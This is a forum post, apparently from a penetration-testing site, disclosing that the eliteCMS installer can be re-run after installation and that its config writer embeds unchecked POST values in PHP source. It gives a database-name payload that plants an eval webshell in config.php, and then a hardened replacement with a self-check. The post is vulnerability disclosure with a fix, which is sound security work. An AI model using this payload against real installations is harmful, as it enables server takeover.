中国网络渗透测试联盟

Title: eliteCMS installer not locked after installation + one-line webshell write vulnerability

Author: admin    Time: 2012-11-18 13:59
The eliteCMS installer is not locked once installation finishes, so anyone can re-run the installation by visiting the installer URL.

A second vulnerability is that the installer will write a one-line webshell straight into admin/includes/config.php.

Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values (copied unchecked from $_POST, see below) are interpolated
    // into PHP source inside double-quoted literals with no escaping at all.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');   // config.php is overwritten with no install-lock check
...
+ ]1 R$ r2 a. [4 E
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.

If the POST data for the database name is:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
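For comparison, here is how the step-4 writer can be hardened. This is an added example written for this page, not eliteCMS code: it refuses to run once an install lock file exists (install.lock is a hypothetical path; eliteCMS has none), and it emits every database setting through var_export(), which produces a single-quoted PHP literal with the quote and backslash characters escaped, so a value containing " or ?> can never leave the string. The generated connection code uses mysqli_connect() in place of the mysql_* calls of the original; the sample values are constructed, and the hostile DB_NAME is the one from the post, used here only to confirm the output stays inert. PHP 7 or later is assumed.

```php
<?php
// Added example (not eliteCMS code): hardened replacement for the step-4
// config writer. Fixes: install lock check, safe serialisation of values,
// atomic write. Run with `php hardened_writer.php` to see the self-check.

// Hypothetical lock file; eliteCMS ships no such file, this is the proposed fix.
const INSTALL_LOCK = __DIR__ . '/install.lock';

// Only these keys are taken from the request; anything else is ignored.
const DB_FIELDS = ['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'];

function install_is_locked(): bool {
    return file_exists(INSTALL_LOCK);
}

// Build the config.php source. $values is an array keyed by DB_FIELDS.
function build_config(array $values): string {
    $out = "<?php\n";
    foreach (DB_FIELDS as $name) {
        $value = (string)($values[$name] ?? '');
        // var_export() yields a single-quoted literal with ' and \ escaped,
        // so whatever the installer user typed is data, never code.
        $out .= "define('" . $name . "', " . var_export($value, true) . ");\n";
    }
    $out .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
    $out .= "if (!\$connection) {\n";
    $out .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
    $out .= "}\n";
    return $out;
}

// Write config.php atomically, then create the lock so step 4 cannot be repeated.
function write_config(string $path, array $values): void {
    if (install_is_locked()) {
        http_response_code(403);
        exit('Installation already completed; delete install.lock to reinstall.');
    }
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, build_config($values), LOCK_EX) === false) {
        throw new RuntimeException("cannot write $tmp");
    }
    rename($tmp, $path);
    file_put_contents(INSTALL_LOCK, date('c') . "\n");
}

// Self-check with constructed input, including the DB_NAME from the post.
$sample = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'elite',
    'DB_PASS'   => "p'ass\\word",
];
$src = build_config($sample);
echo $src;

// Tokenise the generated file without executing it: exactly one T_OPEN_TAG
// means the "?><?php" inside DB_NAME stayed within the string literal.
$opens = 0;
foreach (token_get_all($src) as $tok) {
    if (is_array($tok) && $tok[0] === T_OPEN_TAG) {
        $opens++;
    }
}
echo $opens === 1 ? "OK: single open tag, injected value is inert\n" : "FAIL\n";
```

The self-check only builds the source in memory; write_config() is what the installer would call, and the lock file it drops is the part that closes the first vulnerability (re-running the installer). Deleting install.lock is then a deliberate administrative action rather than something any visitor can trigger.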

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2